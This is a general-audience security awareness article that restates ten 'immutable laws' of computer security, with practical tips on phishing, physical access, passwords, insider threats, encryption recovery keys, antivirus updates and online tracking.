Rule 1: If a bad guy can persuade
you to run his program on your computer, it's not your computer anymore
Most hacks begin this way - you receive an email, or SMS, you
visit a link and are given a convincing reason why you have to install
something.
Or, you receive an email with a document attached, open it and
it installs the malware for you.
Think twice, click once.
If something is unexpected don't trust it: delete it.
Rule 2: If a bad guy can alter
the operating system on your computer, it's not your computer anymore
In the end, an operating system is just a series of ones and zeroes that, when interpreted by the processor, cause the computer to do certain things.
If a bad guy can change them, the now-untrustworthy files will do his bidding, and there's no limit to what he can do. He can steal passwords, make himself an administrator on the computer, or add entirely new functions to the operating system. To prevent this type of attack, make sure that the system files (and the registry, for that matter) are well protected.
If at all possible, buy devices that give you the necessary data
- original keys and software - to reinstall the operating system.
A fresh install is the only way you can be certain of what
you're getting.
Rule 3: If a bad guy has
unrestricted physical access to your computer, it's not your computer anymore
Most people are completely unaware of how vulnerable their
machines are to uploading malicious software simply by allowing someone to plug
in a USB stick.
Even if your computer is powered off, a hacker might be able to
boot off a USB stick and install malware or add hidden elements.
Unless you want to superglue shut all of the physical
connections on your device - not recommended - just do not give anyone
"alone time" with you precious machine.
And, if at all possible, encrypt your hard drive so it is more secure
when powered off.
Rule 4: If you allow a bad guy to
upload programs to your website, it's not your website any more
With over a billion active websites in the world, hackers don't
just target individuals' machines.
They can upload code in unexpected ways.
We have seen major brands breached as they didn't prevent
hackers injecting code into web forms. We have seen malware being passed onto
visitors via embedded adverts.
Website developers typically don't think like hackers. They
design their sites to be helpful and friendly.
You need professional cynics who will advise on how hackers can
abuse such features.
Nothing destroys a brand faster than a website that visitors
think cannot be trusted.
Rule 5: Weak passwords trump
strong security
Always use a password on your computer—it's amazing how many accounts have blank passwords. And develop a complex one and avoid using single “dictionary words”
Once you've picked a strong password, handle it appropriately. Don't write it down. If you absolutely must write it down, at the very least keep it in a safe.
Build a password that has a mix of upper- and lower-case letters, numbers, punctuation marks, and so forth. Make it as long as possible; consider using two words in combination.
You need to practice good password hygiene: use complex
passwords, don't share passwords - between people or systems - and don't write
them on white boards or post-it notes.
Rule 6: A computer is only as
secure as the administrator is trustworthy
The "insider threat" is a growing problem.
Remember that if you give someone privileges on your systems,
you are giving them the keys to the crown jewels.
Plus don't assume that simply because someone works in
technology that they are not subject to human frailties.
They can be scammed out of logon credentials just the same as
mere mortals, and unless your systems are configured to prevent it, those
credentials could enable a hacker to walk away with data.
Make sure valuable data needs more than a simple username and
password for access.
Some major data breaches have happened this way.
Rule 7: Encrypted data is only as
secure as the decryption key
Encryption can be a great tool to prevent criminals getting at
data if a machine is stolen.
But, as computers increase in power, decryption becomes simpler
unless you have a key that is long enough.
Look for encryption that is known to be strong - for example the
Advanced Encryption Standard (AES) - and has keys that are considered
"long".
Also, most encrypted devices have some means of recovering data
if, as we all do, we forget our passwords, or something similar.
If you've ever encrypted a disk you'll probably find you were
asked to make a recovery key using a USB stick or even to print out some long
sequence of letters and numbers.
If you store this recovery information with the protected device
it's hardly worth the effort of encrypting it in the first place.
Lock your recovery keys away somewhere safe and don't carry it
with you.
Rule 8: An out of date virus
checker is only marginally better than none at all
Malicious software is being adapted at an increasing rate.
Hundreds of thousands of new variants appear each year in
addition to completely new strains.
The set of malware that your virus checker knew about when you
first installed it is out of date very quickly.
Hackers do still try to use older versions of malware but they
know many of us fail to keep our systems up to date, so they tweak the malware
in the hope that the virus checker will miss it.
Update your virus checker as regularly as you possibly can, and
do the same for your operating system.
If you tend to turn on your machine infrequently then do your
updates before you start checking those emails or visiting your banks website.
Rule 9: Absolute anonymity isn't
practical, in real life or on the web
Not everyone who wishes to browse the web anonymously is doing
so for illegal reasons.
But be aware that many technologies out there that can provide
anonymity need to be used correctly otherwise you can be tracked.
And remember that being tracked is becoming the norm online.
If you're not a paying customer you are probably the product, as
marketers track you to more accurately target you.
Try using a browser that has "private mode "or
"do not track". It doesn't always work but it may lessen the degree
to which you are monitored.
Rule 10: Technology is not a
panacea
Don't assume that just because your machine is using the latest
versions of everything, and you have the full array of security software
installed, that you are fireproof.
The weakest link in any security chain is us: humans. We fall
for scams, we do silly things and we suffer from security fatigue very quickly.
Worst of all we assume it won't happen to us - until it does.
Phones, tablets or wearables are all essentially small
computers, and the laws written back in 2000 apply to these devices as much as
they ever did to the computers of 15 years ago. In fact, there is a real danger
that we are forgetting the lessons of the last 15 years as hackers hope to
catch us off guard.
These rules have proven to be fundamental in nature, so keep
them in mind no matter what form your "smart" technology takes.
And if in doubt ask someone who knows.
